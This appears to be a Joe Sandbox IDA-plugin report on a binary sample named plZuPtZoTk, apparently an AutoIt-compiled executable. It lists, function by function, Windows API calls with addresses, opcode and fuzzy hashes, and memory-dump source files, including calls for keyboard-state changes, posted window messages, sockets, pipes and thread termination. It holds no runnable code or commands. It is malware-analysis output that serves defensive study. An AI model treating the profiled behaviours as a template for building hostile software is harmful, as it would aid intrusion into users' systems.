                                                                      • Opcode ID: ed4439f7952251cd6e38b6d9a865616cf06fe4867fd2995f4bc777128d3a9101
                                                                      • Instruction ID: 66c57d26816538262c30e8bd052666d73ad59977d80c6481e1add6e713b8f2e1
                                                                      • Opcode Fuzzy Hash: ed4439f7952251cd6e38b6d9a865616cf06fe4867fd2995f4bc777128d3a9101
                                                                      • Instruction Fuzzy Hash: BCD1C579E0060AAFDF10DFA8C891FAEB7B5BF88344F148569E915AB282D770DD41CB50
                                                                      APIs
                                                                      • GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,00A017FB,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 00A015CE
                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00A017FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00A01651
                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00A017FB,?,00A017FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00A016E4
                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00A017FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00A016FB
                                                                        • Part of subcall function 009F3820: RtlAllocateHeap.NTDLL(00000000,?,00A91444,?,009DFDF5,?,?,009CA976,00000010,00A91440,009C13FC,?,009C13C6,?,009C1129), ref: 009F3852
                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00A017FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00A01777
                                                                      • __freea.LIBCMT ref: 00A017A2
                                                                      • __freea.LIBCMT ref: 00A017AE
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                                                      • String ID:
                                                                      • API String ID: 2829977744-0
                                                                      • Opcode ID: df0acc829f2e39c598079b7c7b229ba022d2c37f0aa1e7c66fe3b1b8c73fdc8a
                                                                      • Instruction ID: 629e0004947073b9f5506804952b5f74fe37e01b65e9784bb4216b1ebf6cb7ec
                                                                      • Opcode Fuzzy Hash: df0acc829f2e39c598079b7c7b229ba022d2c37f0aa1e7c66fe3b1b8c73fdc8a
                                                                      • Instruction Fuzzy Hash: 09919471E0021E9FDB208FA4ED81AEEBBB5AF89710F584659E901EB1C1D735DD41CB60
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Variant$ClearInit
                                                                      • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                      • API String ID: 2610073882-625585964
                                                                      • Opcode ID: 22306c7e0c54c3453b05f4c441ffc1e919f5aef9924f3f97626d60781ca4d99a
                                                                      • Instruction ID: cd9bb8ef91f97c671ab755a0fe3dd8f82b637ed3391e92d5b168b65f2df538ab
                                                                      • Opcode Fuzzy Hash: 22306c7e0c54c3453b05f4c441ffc1e919f5aef9924f3f97626d60781ca4d99a
                                                                      • Instruction Fuzzy Hash: 10917275A00215AFDF20CFA5C848FAEBBB8FF8A715F108559F515AB280D7709945CFA0
                                                                      APIs
                                                                      • SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 00A3125C
                                                                      • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00A31284
                                                                      • SafeArrayUnaccessData.OLEAUT32(00000001), ref: 00A312A8
                                                                      • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00A312D8
                                                                      • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00A3135F
                                                                      • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00A313C4
                                                                      • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00A31430
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: ArraySafe$Data$Access$UnaccessVartype
                                                                      • String ID:
                                                                      • API String ID: 2550207440-0
                                                                      • Opcode ID: 4025e9494cf38acc666529072f318f4801f2263f50ea828acf56d4b1e4678b40
                                                                      • Instruction ID: 5d9bcf18b03634654ca06409898b0f307ff6321dab347a39eaad49e0db749a0d
                                                                      • Opcode Fuzzy Hash: 4025e9494cf38acc666529072f318f4801f2263f50ea828acf56d4b1e4678b40
                                                                      • Instruction Fuzzy Hash: 7791BBB5A00308AFDB00DFA8C895BBEB7B5FF44325F108029F911EB291D774A942CB90
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
Similarity
• API ID: ObjectSelect$BeginCreatePath
• String ID:
• API String ID: 3225163088-0
• Opcode ID: 08e8478a1b84f8c9d9a214b3797e506c710d3f5f2b1d9d0c612bd0a7162af22d
• Instruction ID: 70415f35a4ce1a9c5d3f7eed90e31ca86ee71d06b5038d509390a16091849ac3
• Opcode Fuzzy Hash: 08e8478a1b84f8c9d9a214b3797e506c710d3f5f2b1d9d0c612bd0a7162af22d
• Instruction Fuzzy Hash: B3913771D44219EFCB10DFA9CC84AEEBBB8FF49320F148556E915B7251D378AA42CB60
APIs
• VariantInit.OLEAUT32(?), ref: 00A4396B
• CharUpperBuffW.USER32(?,?), ref: 00A43A7A
• _wcslen.LIBCMT ref: 00A43A8A
• VariantClear.OLEAUT32(?), ref: 00A43C1F
  • Part of subcall function 00A30CDF: VariantInit.OLEAUT32(00000000), ref: 00A30D1F
  • Part of subcall function 00A30CDF: VariantCopy.OLEAUT32(?,?), ref: 00A30D28
  • Part of subcall function 00A30CDF: VariantClear.OLEAUT32(?), ref: 00A30D34
Strings
Similarity
• API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
• String ID: AUTOIT.ERROR$Incorrect Parameter format
• API String ID: 4137639002-1221869570
• Opcode ID: afa310e06178d14d85dfb3fac40ab348b707146ea6197e9d1a7020976a227c1e
• Instruction ID: 54c6768444538cf74f5112b348755246efae473b8d92413e90ef840e52365534
• Opcode Fuzzy Hash: afa310e06178d14d85dfb3fac40ab348b707146ea6197e9d1a7020976a227c1e
• Instruction Fuzzy Hash: C3912575A083059FCB00EF64C481A6AB7E5FBC8314F14896DF88A97351DB31EE06CB92
APIs
  • Part of subcall function 00A2000E: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00A1FF41,80070057,?,?,?,00A2035E), ref: 00A2002B
  • Part of subcall function 00A2000E: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00A1FF41,80070057,?,?), ref: 00A20046
  • Part of subcall function 00A2000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00A1FF41,80070057,?,?), ref: 00A20054
  • Part of subcall function 00A2000E: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00A1FF41,80070057,?), ref: 00A20064
• CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00A44C51
• _wcslen.LIBCMT ref: 00A44D59
• CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00A44DCF
• CoTaskMemFree.OLE32(?), ref: 00A44DDA
Strings
Similarity
• API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
• String ID: NULL Pointer assignment
• API String ID: 614568839-2785691316
• Opcode ID: c7c2c8256a6a2f17b022e6cbab837743fbf747f9861af4d59d51a3447b9acfa9
• Instruction ID: f392a8b7e3cdb4b011822ed0c9fba58127139b6a80f8b9bdfb54f8d512d1dd72
• Opcode Fuzzy Hash: c7c2c8256a6a2f17b022e6cbab837743fbf747f9861af4d59d51a3447b9acfa9
• Instruction Fuzzy Hash: 28912371D0021DAFDF10DFA4D891FEEB7B9BF88314F10816AE915A7241EB309A458FA1
APIs
• GetMenu.USER32(?), ref: 00A52183
• GetMenuItemCount.USER32(00000000), ref: 00A521B5
• GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00A521DD
• _wcslen.LIBCMT ref: 00A52213
• GetMenuItemID.USER32(?,?), ref: 00A5224D
• GetSubMenu.USER32(?,?), ref: 00A5225B
  • Part of subcall function 00A23A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00A23A57
  • Part of subcall function 00A23A3D: GetCurrentThreadId.KERNEL32 ref: 00A23A5E
  • Part of subcall function 00A23A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00A225B3), ref: 00A23A65
• PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00A522E3
  • Part of subcall function 00A2E97B: Sleep.KERNEL32 ref: 00A2E9F3
Similarity
• API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
• String ID:
• API String ID: 4196846111-0
• Opcode ID: d1a3b2af0cb5f5e15b59efa53703edb66697f80fd6695f2ce21e2541ffbed102
• Instruction ID: 71d2d517eef75bd4ca1e6d98441ccd1ffdd425eaccd3cf7c9ffcf1cbb3644b4e
• Opcode Fuzzy Hash: d1a3b2af0cb5f5e15b59efa53703edb66697f80fd6695f2ce21e2541ffbed102
• Instruction Fuzzy Hash: 6A717E75E00205AFCB10DFA4C885BAEB7F1FF89321F148469E816EB341D734AE468B90
APIs
• GetParent.USER32(?), ref: 00A2AEF9
• GetKeyboardState.USER32(?), ref: 00A2AF0E
• SetKeyboardState.USER32(?), ref: 00A2AF6F
• PostMessageW.USER32(?,00000101,00000010,?), ref: 00A2AF9D
• PostMessageW.USER32(?,00000101,00000011,?), ref: 00A2AFBC
• PostMessageW.USER32(?,00000101,00000012,?), ref: 00A2AFFD
• PostMessageW.USER32(?,00000101,0000005B,?), ref: 00A2B020
Similarity
• API ID: MessagePost$KeyboardState$Parent
• String ID:
• API String ID: 87235514-0
• Opcode ID: e2412235ef9ed417ed04b6e42b3f461fcb77260eb78860e0a0b5d7211ba1028b
• Instruction ID: 98b8c205a8aacec8425306c9af26ad7a17d41661f46e417403d8b27392f679ff
• Opcode Fuzzy Hash: e2412235ef9ed417ed04b6e42b3f461fcb77260eb78860e0a0b5d7211ba1028b
• Instruction Fuzzy Hash: D051E4A06187E53EFB37833C9D45BBA7FE95B06304F0884A9E1D9558C2C398ADC4D761
APIs
• GetParent.USER32(00000000), ref: 00A2AD19
• GetKeyboardState.USER32(?), ref: 00A2AD2E
• SetKeyboardState.USER32(?), ref: 00A2AD8F
• PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00A2ADBB
• PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00A2ADD8
• PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00A2AE17
• PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00A2AE38
Similarity
• API ID: MessagePost$KeyboardState$Parent
• String ID:
• API String ID: 87235514-0
• Opcode ID: 6b98179ae4b024ef44651cf7cb5ea11082e24ce4a4356f252c6524d35f830019
• Instruction ID: c9cac96c878e4a76778ea29ffa22ca1acbbe313ede37835ab13344d64ea2f11c
• Opcode Fuzzy Hash: 6b98179ae4b024ef44651cf7cb5ea11082e24ce4a4356f252c6524d35f830019
• Instruction Fuzzy Hash: 4D5106A16047F13FFB3683389C55BBABEA96B55300F0884A8E1D5568C3D294EC85D762
APIs
• GetConsoleCP.KERNEL32(00A03CD6,?,?,?,?,?,?,?,?,009F5BA3,?,?,00A03CD6,?,?), ref: 009F5470
• __fassign.LIBCMT ref: 009F54EB
• __fassign.LIBCMT ref: 009F5506
• WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00A03CD6,00000005,00000000,00000000), ref: 009F552C
• WriteFile.KERNEL32(?,00A03CD6,00000000,009F5BA3,00000000,?,?,?,?,?,?,?,?,?,009F5BA3,?), ref: 009F554B
• WriteFile.KERNEL32(?,?,00000001,009F5BA3,00000000,?,?,?,?,?,?,?,?,?,009F5BA3,?), ref: 009F5584
Similarity
• API ID: FileWrite__fassign$ByteCharConsoleMultiWide
• String ID:
• API String ID: 1324828854-0
• Opcode ID: 27cc4e38359b5fa17095d415452ea3615f7c01c22fb26d520bdd3e6f0a08f2b7
• Instruction ID: 1165453c6e6a8b04f742a526fcc032ce816941365ea38b1788c12ee9d9209cc5
• Opcode Fuzzy Hash: 27cc4e38359b5fa17095d415452ea3615f7c01c22fb26d520bdd3e6f0a08f2b7
• Instruction Fuzzy Hash: EA51C071A00749AFDB10CFA8D885AEEBBF9FF09310F15451AFA55E7291D7309A41CB60
APIs
• _ValidateLocalCookies.LIBCMT ref: 009E2D4B
• ___except_validate_context_record.LIBVCRUNTIME ref: 009E2D53
• _ValidateLocalCookies.LIBCMT ref: 009E2DE1
• __IsNonwritableInCurrentImage.LIBCMT ref: 009E2E0C
• _ValidateLocalCookies.LIBCMT ref: 009E2E61
Strings
Similarity
• API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
• String ID: csm
• API String ID: 1170836740-1018135373
• Opcode ID: d2f50e24c62c868baccc0f652450a4ae48dc5f8792a6c7eb2e548caf9c7b064e
• Instruction ID: 970970c67ef3ccbec44202e6ef53f88c4a35f5e35629603493f2e5fa15bd1b18
• Opcode Fuzzy Hash: d2f50e24c62c868baccc0f652450a4ae48dc5f8792a6c7eb2e548caf9c7b064e
• Instruction Fuzzy Hash: 8E41B234E00289EBCF11DF6ACC45B9EBBB9BF84324F148155E914AB392D771AE41CB90
APIs
  • Part of subcall function 00A4304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00A4307A
  • Part of subcall function 00A4304E: _wcslen.LIBCMT ref: 00A4309B
• socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00A41112
• WSAGetLastError.WSOCK32 ref: 00A41121
• WSAGetLastError.WSOCK32 ref: 00A411C9
• closesocket.WSOCK32(00000000), ref: 00A411F9
Similarity
• API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
• String ID:
• API String ID: 2675159561-0
• Opcode ID: 9c8b10a81f44f0b4c6e0d824a60ccad193b921c8921aef0510b07a6850be8f4c
• Instruction ID: 6847f8b71a16599638dc736ec40ad5bd733c7fcaecaf0a113f4f0cb68d11682d
• Opcode Fuzzy Hash: 9c8b10a81f44f0b4c6e0d824a60ccad193b921c8921aef0510b07a6850be8f4c
• Instruction Fuzzy Hash: 2341F435600204AFDB10DF68C884BA9BBE9FF85325F14815DF9099B295D770AE82CBE1
APIs
  • Part of subcall function 00A2DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00A2CF22,?), ref: 00A2DDFD
  • Part of subcall function 00A2DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00A2CF22,?), ref: 00A2DE16
• lstrcmpiW.KERNEL32(?,?), ref: 00A2CF45
• MoveFileW.KERNEL32(?,?), ref: 00A2CF7F
• _wcslen.LIBCMT ref: 00A2D005
• _wcslen.LIBCMT ref: 00A2D01B
• SHFileOperationW.SHELL32(?), ref: 00A2D061
Strings
                                                                      Similarity
                                                                      • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                                                                      • String ID: \*.*
                                                                      • API String ID: 3164238972-1173974218
APIs
• SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00A52E1C
• GetWindowLongW.USER32(00000000,000000F0), ref: 00A52E4F
• GetWindowLongW.USER32(00000000,000000F0), ref: 00A52E84
• SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00A52EB6
• SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00A52EE0
• GetWindowLongW.USER32(00000000,000000F0), ref: 00A52EF1
• SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00A52F0B
Memory Dump Source
• Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
• Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
Similarity
• API ID: LongWindow$MessageSend
• String ID:
• API String ID: 2178440468-0
APIs
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00A27769
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00A2778F
• SysAllocString.OLEAUT32(00000000), ref: 00A27792
• SysAllocString.OLEAUT32(?), ref: 00A277B0
• SysFreeString.OLEAUT32(?), ref: 00A277B9
• StringFromGUID2.OLE32(?,?,00000028), ref: 00A277DE
• SysAllocString.OLEAUT32(?), ref: 00A277EC
Memory Dump Source
• Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
• Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
Similarity
• API ID: String$Alloc$ByteCharMultiWide$FreeFrom
• String ID:
• API String ID: 3761583154-0
APIs
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00A27842
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00A27868
• SysAllocString.OLEAUT32(00000000), ref: 00A2786B
• SysAllocString.OLEAUT32 ref: 00A2788C
• SysFreeString.OLEAUT32 ref: 00A27895
• StringFromGUID2.OLE32(?,?,00000028), ref: 00A278AF
• SysAllocString.OLEAUT32(?), ref: 00A278BD
Memory Dump Source
• Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
• Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
Similarity
• API ID: String$Alloc$ByteCharMultiWide$FreeFrom
• String ID:
• API String ID: 3761583154-0
APIs
• GetStdHandle.KERNEL32(0000000C), ref: 00A304F2
• CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00A3052E
Strings
Memory Dump Source
• Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
• Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
Similarity
• API ID: CreateHandlePipe
• String ID: nul
• API String ID: 1424370930-2873401336
APIs
• GetStdHandle.KERNEL32(000000F6), ref: 00A305C6
• CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00A30601
Strings
Memory Dump Source
• Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
• Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
Similarity
• API ID: CreateHandlePipe
• String ID: nul
• API String ID: 1424370930-2873401336
APIs
  • Part of subcall function 009C600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 009C604C
  • Part of subcall function 009C600E: GetStockObject.GDI32(00000011), ref: 009C6060
  • Part of subcall function 009C600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 009C606A
• SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00A54112
• SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00A5411F
• SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00A5412A
• SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00A54139
• SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00A54145
Strings
Memory Dump Source
• Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
• Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
Similarity
• API ID: MessageSend$CreateObjectStockWindow
• String ID: Msctls_Progress32
• API String ID: 1025951953-3636473452
APIs
  • Part of subcall function 009FD7A3: _free.LIBCMT ref: 009FD7CC
• _free.LIBCMT ref: 009FD82D
  • Part of subcall function 009F29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,009FD7D1,00000000,00000000,00000000,00000000,?,009FD7F8,00000000,00000007,00000000,?,009FDBF5,00000000), ref: 009F29DE
  • Part of subcall function 009F29C8: GetLastError.KERNEL32(00000000,?,009FD7D1,00000000,00000000,00000000,00000000,?,009FD7F8,00000000,00000007,00000000,?,009FDBF5,00000000,00000000), ref: 009F29F0
• _free.LIBCMT ref: 009FD838
• _free.LIBCMT ref: 009FD843
• _free.LIBCMT ref: 009FD897
• _free.LIBCMT ref: 009FD8A2
• _free.LIBCMT ref: 009FD8AD
• _free.LIBCMT ref: 009FD8B8
Memory Dump Source
• Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
• Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
APIs
• GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00A2DA74
• LoadStringW.USER32(00000000), ref: 00A2DA7B
• GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00A2DA91
• LoadStringW.USER32(00000000), ref: 00A2DA98
• MessageBoxW.USER32(00000000,?,?,00011010), ref: 00A2DADC
Strings
• %s (%d) : ==> %s: %s %s, xrefs: 00A2DAB9
Memory Dump Source
• Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
• Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
Similarity
• API ID: HandleLoadModuleString$Message
• String ID: %s (%d) : ==> %s: %s %s
• API String ID: 4072794657-3128320259
APIs
• InterlockedExchange.KERNEL32(0165E690,0165E690), ref: 00A3097B
• EnterCriticalSection.KERNEL32(0165E670,00000000), ref: 00A3098D
• TerminateThread.KERNEL32(00000000,000001F6), ref: 00A3099B
• WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00A309A9
• CloseHandle.KERNEL32(00000000), ref: 00A309B8
• InterlockedExchange.KERNEL32(0165E690,000001F6), ref: 00A309C8
• LeaveCriticalSection.KERNEL32(0165E670), ref: 00A309CF
Memory Dump Source
• Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
• Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
